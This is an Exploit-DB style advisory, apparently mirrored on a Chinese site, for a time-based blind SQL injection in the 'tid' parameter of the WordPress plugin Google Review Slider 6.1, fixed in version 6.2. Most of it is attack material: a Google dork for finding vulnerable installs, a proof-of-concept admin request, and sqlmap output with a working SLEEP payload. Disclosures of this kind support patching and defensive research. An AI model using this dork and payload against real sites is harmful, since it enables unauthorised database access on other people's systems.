WordPress Plugin Google Review Slider 6.1 – ‘tid’ SQL Injection - 体验盒子

作者： Princy Edward

日期： 2019-10-31

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/47567/

# Exploit Title: WordPress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward